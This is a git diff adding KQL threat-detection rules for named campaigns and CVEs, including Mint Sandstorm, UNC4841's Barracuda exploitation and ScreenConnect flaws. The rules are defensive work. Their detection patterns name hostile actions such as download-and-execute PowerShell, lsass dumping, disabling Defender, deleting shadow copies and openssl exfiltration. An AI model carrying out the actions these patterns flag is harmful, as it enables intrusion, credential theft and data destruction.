+// Description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where SHA256 startswith "B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Lazarus/lazarus_apt_dll_sideloading_activity.kql b/KQL/rules-emerging-threats/2023/TA/Lazarus/lazarus_apt_dll_sideloading_activity.kql
new file mode 100644
index 00000000..c4eb1c3d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Lazarus/lazarus_apt_dll_sideloading_activity.kql
@@ -0,0 +1,12 @@
+// Title: Lazarus APT DLL Sideloading Activity
+// Author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-18
+// Level: high
+// Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001, attack.g0032, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\colorcpl.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\colorui.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\tabcal.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\HID.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Oracle\\Java\\fixmapi.exe" and FolderPath =~ "C:\\ProgramData\\Oracle\\Java\\mapistub.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramShared\\PresentationHost.exe" and FolderPath =~ ":\\ProgramShared\\mscoree.dll")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_asperafaspex_suspicious_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
new file mode 100644
index 00000000..df62ad21
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_asperafaspex_suspicious_process_execution.kql
@@ -0,0 +1,12 @@
+// Title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: critical
+// Description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "aspera" and InitiatingProcessFolderPath contains "\\ruby") and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or (ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_log4j_wstomcat_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_log4j_wstomcat_process_execution.kql
new file mode 100644
index 00000000..30d8b440
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_log4j_wstomcat_process_execution.kql
@@ -0,0 +1,10 @@
+// Title: Mint Sandstorm - Log4J Wstomcat Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: high
+// Description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe" and (not(FolderPath endswith "\\repadmin.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_manageengine_suspicious_process_execution.kql b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_manageengine_suspicious_process_execution.kql
new file mode 100644
index 00000000..f77b004e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Mint-Sandstorm/mint_sandstorm_manageengine_suspicious_process_execution.kql
@@ -0,0 +1,12 @@
+// Title: Mint Sandstorm - ManageEngine Suspicious Process Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
+// Date: 2023-04-20
+// Level: critical
+// Description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "\\java" and (InitiatingProcessFolderPath contains "manageengine" or InitiatingProcessFolderPath contains "ServiceDesk")) and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\ssession") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy"))) and (not((ProcessCommandLine contains "download.microsoft.com" and ProcessCommandLine contains "manageengine.com" and ProcessCommandLine contains "msiexec")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/potential_apt_mustang_panda_activity_against_australian_gov.kql b/KQL/rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/potential_apt_mustang_panda_activity_against_australian_gov.kql
new file mode 100644
index 00000000..82f54647
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/potential_apt_mustang_panda_activity_against_australian_gov.kql
@@ -0,0 +1,12 @@
+// Title: Potential APT Mustang Panda Activity Against Australian Gov
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0129, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "copy SolidPDFCreator.dll" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\SolidPDFCreator.dll") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "SolidPDF" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Onyx-Sleet/onyx_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Onyx-Sleet/onyx_sleet_apt_file_creation_indicators.kql
new file mode 100644
index 00000000..60520517
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Onyx-Sleet/onyx_sleet_apt_file_creation_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Onyx Sleet APT File Creation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects file creation activity that is related to Onyx Sleet APT activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ":\\Windows\\ADFS\\bg\\inetmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_exploitation_related_indicators.kql b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_exploitation_related_indicators.kql
new file mode 100644
index 00000000..795a80c1
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_exploitation_related_indicators.kql
@@ -0,0 +1,12 @@
+// Title: PaperCut MF/NG Exploitation Related Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-25
+// Level: high
+// Description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /c " and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-nop -w hidden" and ProcessCommandLine contains "Invoke-WebRequest" and ProcessCommandLine contains "setup.msi" and ProcessCommandLine contains "-OutFile") or (ProcessCommandLine contains "msiexec " and ProcessCommandLine contains "/i " and ProcessCommandLine contains "setup.msi " and ProcessCommandLine contains "/qn " and ProcessCommandLine contains "IntegratorLogin=fimaribahundq")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_potential_exploitation.kql b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_potential_exploitation.kql
new file mode 100644
index 00000000..e0de122d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/papercut_mf_ng_potential_exploitation.kql
@@ -0,0 +1,12 @@
+// Title: PaperCut MF/NG Potential Exploitation
+// Author: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea)
+// Date: 2023-04-20
+// Level: high
+// Description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Legitimate administration activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\pc-app.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/Peach-Sandstorm/peach_sandstorm_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/2023/TA/Peach-Sandstorm/peach_sandstorm_apt_process_activity_indicators.kql
new file mode 100644
index 00000000..dce74b98
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/Peach-Sandstorm/peach_sandstorm_apt_process_activity_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Peach Sandstorm APT Process Activity Indicators
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-01-15
+// Level: high
+// Description: Detects process creation activity related to Peach Sandstorm APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "QP's*(58vaP!tF4"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_barracuda_esg_exploitation_indicators.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_barracuda_esg_exploitation_indicators.kql
new file mode 100644
index 00000000..1d8ce1ba
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_barracuda_esg_exploitation_indicators.kql
@@ -0,0 +1,12 @@
+// Title: UNC4841 - Barracuda ESG Exploitation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "/11111.tar" or FolderPath endswith "/aacore.sh" or FolderPath endswith "/appcheck.sh" or FolderPath endswith "/autoins" or FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/etc/cron.daily/core_check.sh" or FolderPath endswith "/etc/cron.daily/core.sh" or FolderPath endswith "/etc/cron.hourly/aacore.sh" or FolderPath endswith "/etc/cron.hourly/appcheck.sh" or FolderPath endswith "/etc/cron.hourly/core.sh" or FolderPath endswith "/get_fs_info.pl" or FolderPath endswith "/imgdata.jpg" or FolderPath endswith "/install_att_v2.tar" or FolderPath endswith "/install_bvp74_auth.tar" or FolderPath endswith "/install_helo.tar" or FolderPath endswith "/install_reuse.tar" or FolderPath endswith "/intent_helo" or FolderPath endswith "/intent_reuse" or FolderPath endswith "/intentbas" or FolderPath endswith "/mod_attachment.lua" or FolderPath endswith "/mod_content.lua" or FolderPath endswith "/mod_require_helo.lua" or FolderPath endswith "/mod_rtf" or FolderPath endswith "/mod_sender.lua" or FolderPath endswith "/mod_udp.so" or FolderPath endswith "/nfsd_stub.ko" or FolderPath endswith "/resize_reisertab" or FolderPath endswith "/resize_risertab" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/rverify" or FolderPath endswith "/saslautchd" or FolderPath endswith "/sendscd" or FolderPath endswith "/snapshot.tar" or FolderPath endswith "/tmp/p" or FolderPath endswith "/tmp/p7" or FolderPath endswith "/tmp/t" or FolderPath endswith "/update_v2.sh" or FolderPath endswith "/update_v31.sh" or FolderPath endswith "/update_v35.sh" or FolderPath endswith "/update_version"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_compressed_files_from_temp_sh_using_wget.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
new file mode 100644
index 00000000..29eea50f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - Download Compressed Files From Temp.sh Using Wget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "https://temp.sh/" and (ProcessCommandLine endswith ".rar" or ProcessCommandLine endswith ".zip") and FolderPath endswith "/wget"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
new file mode 100644
index 00000000..0c885527
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--no-check-certificate" and ProcessCommandLine endswith ".tar" and ProcessCommandLine matches regex "https://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/wget") and (not((ProcessCommandLine contains "https://10." or ProcessCommandLine contains "https://192.168." or ProcessCommandLine contains "https://172.16." or ProcessCommandLine contains "https://172.17." or ProcessCommandLine contains "https://172.18." or ProcessCommandLine contains "https://172.19." or ProcessCommandLine contains "https://172.20." or ProcessCommandLine contains "https://172.21." or ProcessCommandLine contains "https://172.22." or ProcessCommandLine contains "https://172.23." or ProcessCommandLine contains "https://172.24." or ProcessCommandLine contains "https://172.25." or ProcessCommandLine contains "https://172.26." or ProcessCommandLine contains "https://172.27." or ProcessCommandLine contains "https://172.28." or ProcessCommandLine contains "https://172.29." or ProcessCommandLine contains "https://172.30." or ProcessCommandLine contains "https://172.31." or ProcessCommandLine contains "https://127." or ProcessCommandLine contains "https://169.254.")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_email_exfiltration_file_pattern.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_email_exfiltration_file_pattern.kql
new file mode 100644
index 00000000..6ddf36c6
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_email_exfiltration_file_pattern.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - Email Exfiltration File Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath matches regex "/mail/tmp/[a-zA-Z0-9]{3}[0-9]{3}\\.tar\\.gz"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_potential_seaspy_execution.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_potential_seaspy_execution.kql
new file mode 100644
index 00000000..cc460d78
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_potential_seaspy_execution.kql
@@ -0,0 +1,12 @@
+// Title: UNC4841 - Potential SEASPY Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: critical
+// Description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/resize_reisertab"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_ssl_certificate_exfiltration_via_openssl.kql b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_ssl_certificate_exfiltration_via_openssl.kql
new file mode 100644
index 00000000..1b1c2190
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/unc4841_ssl_certificate_exfiltration_via_openssl.kql
@@ -0,0 +1,10 @@
+// Title: UNC4841 - SSL Certificate Exfiltration Via Openssl
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":443" or ProcessCommandLine contains ":8080") and (ProcessCommandLine contains "s_client" and ProcessCommandLine contains "-quiet" and ProcessCommandLine contains "-connect") and ProcessCommandLine matches regex "[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/openssl"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1708/cve_2024_1708_screenconnect_path_traversal_exploitation.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1708/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
new file mode 100644
index 00000000..34569775
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1708/cve_2024_1708_screenconnect_path_traversal_exploitation.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation
+// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
+// Date: 2024-02-21
+// Level: medium
+// Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, cve.2024-1708, detection.emerging-threats
+// False Positives:
+//   - This will occur legitimately as well and will result in some benign activity.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and ((FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".ashx") or (FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".aspx"))) and (not(FolderPath =~ "*ScreenConnect\\App_Extensions\*\*"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1709/screenconnect_user_database_modification.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1709/screenconnect_user_database_modification.kql
new file mode 100644
index 00000000..eec23dce
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-1709/screenconnect_user_database_modification.kql
@@ -0,0 +1,13 @@
+// Title: ScreenConnect User Database Modification
+// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress
+// Date: 2024-02-21
+// Level: medium
+// Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
+// This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, cve.2024-1709, detection.emerging-threats
+// False Positives:
+//   - This will occur legitimately as well and will result in some benign activity.
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and (FolderPath contains "Temp" and FolderPath contains "ScreenConnect") and FolderPath endswith ".xml"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3094/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3094/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
new file mode 100644
index 00000000..0336753c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3094/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process
+// Author: Arnim Rupp, Nasreddine Bencherchali, Thomas Patzke
+// Date: 2024-04-01
+// Level: high
+// Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-3094, detection.emerging-threats
+// False Positives:
+//   - Administrative activity directly with root authentication might trigger this rule if it's unnecessarily prefixed with "sh -c" or "bash -c"
+
+DeviceProcessEvents
+| where (ProcessCommandLine startswith "bash -c" or ProcessCommandLine startswith "sh -c") and InitiatingProcessFolderPath endswith "/sshd" and AccountName =~ "root"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3400/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3400/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
new file mode 100644
index 00000000..a8824448
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Exploits/CVE-2024-3400/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
